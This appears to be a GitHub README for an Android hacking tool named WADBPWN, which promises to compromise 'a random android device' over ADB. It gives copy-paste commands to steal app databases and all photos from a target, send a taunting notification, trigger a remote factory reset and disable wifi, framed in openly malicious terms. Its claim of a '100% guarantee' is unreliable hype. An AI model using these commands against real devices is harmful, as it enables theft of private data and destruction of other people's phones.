Skip to content

Hack a random android device with 100% guarantee to succeed within 1 second, all you really need is to copy and paste 3 lines.

License

Notifications You must be signed in to change notification settings

joosefinnilsson/WADBPWN

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 

Repository files navigation

WADBPWN

Hack a random android device with 100% guarantee to succeed within 1 second from you launching the script.

The easiest methods that are the most effective methods

Screenshot

Get Started On Linux/MacOSX

git clone https://github.com/wuseman/wadbpwn
cd wadbpwn
chmod +x wadb*
bash ./wadbpwn.sh

- Wait ~1 second

Target has been pwned!

Enjoy ;-)

Get Started On Windows 10

Install any linux distro from microsoft store and run commands above..

Tips & Tricks made by wuseman

Steal all databases from the device ( require root )

which su &> /dev/null
if [[ $? -eq "0" ]]; then
   adb pull /data/data/ /some/path
else
   printf "* No root detected, just try another target..\n"
   exit 1
fi

Steal all pictures:

A simple example:
PICS="$(adb shell 'su -c find / \( -name '*.png' -name '*.jpg*' \)')"
for pictures in $PICS; do
   adb pull -p $PICS /some/folder
 done
printf "Done..is it your lucky day? ;-)\n"

Let the owner know that you have hacked him, send a push notice:

adb shell am broadcast -a com.google.android.c2dm.intent.RECEIVE -n <your.app.package>/com.google.android.gms.gcm.GcmReceiver --es "You h4v3 b33n h3cked mat3" "hrhr!"

For be an d*ck and do a factory reset of the device:

adb shell am broadcast -a android.intent.action.MASTER_CLEAR
adb shell reboot 

For be device owners hero for a day you should shut down the targets wifi connection, but why?

adb shell svc wifi disable

System requirements

  • Android Debug Bridge (adb) - Find more info about adb here

Changelog

Versions changelog.

Authors:

License

This project is licensed under the GNU General Public License v3.0 - see the LICENSE.md file for details

Contact

If you have problems, questions, ideas or suggestions please contact me on the e-email under Authors or you can chat with me for faster contact by visit freenode chat and type '/msg wuseman hi!' in the input bar and I will reply you ASAP I will see the message.

Enter Freenode chat via your own client or use the web client by visit this page

Haters Gonna Hate

wuseman cannot be held as responsible for users actions regardless of what damage a user can do. All users that gathering information or data via wadbpwn is 100% responsible for their own actions, wadbpwn has been developed for a legal purpose.

About

Hack a random android device with 100% guarantee to succeed within 1 second, all you really need is to copy and paste 3 lines.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages